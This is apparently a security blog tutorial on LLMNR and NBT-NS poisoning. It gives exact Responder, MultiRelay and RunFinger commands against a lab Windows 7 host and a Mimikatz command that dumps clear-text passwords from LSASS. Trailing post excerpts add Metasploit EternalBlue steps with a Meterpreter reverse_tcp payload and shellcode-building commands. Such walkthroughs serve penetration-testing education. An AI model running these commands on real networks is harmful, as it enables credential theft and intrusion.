LLMNR and NBT-NS poisoning attack using Responder and MultiRelay

In the previous post we discussed the basis for a LLMNR and NBT-NS attack and we showed this attack by using four Metasploit modules.

In this new video we will continue to demonstrate the LLMNR and NBT-NS attack, but instead of Metasploit we will be using Laurent Gaffie's Responder script.

Responder

Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages.
Responder is also a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

 More information about Responder and its related utilities can be found on Laurent Gaffie's Blog.

The script can be downloaded from Github on: https://github.com/lgandx/Responder

The following options are available when running Responder:


The following command was used to launch Responder during the video demonstration:

./Responder.py -I eth0 -w -f

where:
-I eth0 --> Responder will use the eth0 Network Interface
-w        --> start the WPAD rogue server
-f          --> fingerprint the hosts sending LLMNR or NBT-NS queries

MultiRelay

MultiRelay is a powerful Responder-related tool which is able to perform targeted NTLMv1 and NTLMv2 relay and post exploitation on a selected target.

The following MultiRelay command was used during the video:

./MultiRelay.py -t 192.168.254.70 -u ALL

where:
-t 192.168.254.70 --> specifies the target computer (IP address for the Windows 7 test computer)
-u ALL                     --> all captured authentication requests will be relayed to target

MultiRelay works in conjunction with Responder. In a typical scenario, Responder would poison the LLMNR and NBT-NS name queries, while MultiRelay would parse the authentication requests and relay them to the target computer.

For MultiRelay to work correctly, the target computer should have SMB Signing disabled.
More details on SMB signing can be found in this Microsoft article and in this article.

For more details on MultiRelay, please check these two excellent articles on Laurent Gaffie's Blog:
Introducing Responder MultiRelay 1.0 and MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love

During the video presentation, we successfully used the MultiRelay script to relay the user authentication request to a Windows 7 target computer. After that, we dumped the user passwords in clear text from the LSASS process memory, by using the following Mimikatz command:

mimi sekurlsa::logonpasswords

RunFinger

RunFinger is another Responder-related utility which will finger a single IP address or an IP subnet and will reveal (among other useful information) if a target requires SMB Signing or not. This information will help with choosing targets for the MultiRelay script.

The following RunFinger command was used during the video:

./RunFinger.py -i 192.168.254.0/24

where:
-i 192.168.254.0/24 --> specifies the IP subnet used by the test machines

LLMNR and NBT-NS poisoning attack using Responder and MultiRelay



Comments

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Image
Previously we identified the MS17-010 vulnerability by scanning using NMAP and by scanning with a Metasploit auxiliary module.

In the video below we will exploit the MS17-010 vulnerability by using the EternalBlue Metasploit module which comes by default with Metasploit Framework.

Metasploit commands used in this video:
search ms17_010
This command identifies modules containing the "ms17_010" string.
use exploit/windows/smb/ms17_010_eternalblue
This command selects the "exploit/windows/smb/ms17_010_eternalblue" module.
show options
This command displays the options available for the selected module.
set processname lsass.exe
This commands selects the process to inject the payload into.
set rhost <IP_Address>
This command sets the target IP address.
show payloads
This command (when is executed under the module context), shows the payloads compatible with the selected module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp paylo…
Read more

Generating shellcode - using msfvenom to generate a binary payload

Image
In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file.

The second component for our payload, is the part of the code which will create the Meterpreter shell fro…
Read more

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux

Image
In the video below we will identify computers affected by the MS17-010 vulnerability, by  using a Metasploit auxiliary scanning module.
Check also my other post on detecting the MS17-010 vulnerability by using NMAP.

MS17-010 is a severe SMB Server vulnerability which affected all Windows operating systems and was exploited by WannaCry, Petya and Bad Rabbit Ransomware.
This vulnerability was made public in March 2017 and allowed remote code execution on the victim computer. 
For more information, check the Microsoft Security Bulletin MS17-010:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010
https://support.microsoft.com/en-au/help/4013389/title

Metasploit commands used in this video:
search name:ms17_010 
This command lists the Metasploit modules containing the string "ms17_010" in the name. 
Can also simply use: search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
This command selects the module "auxiliary/scanner/smb/smb_ms17_010".
show opti…
Read more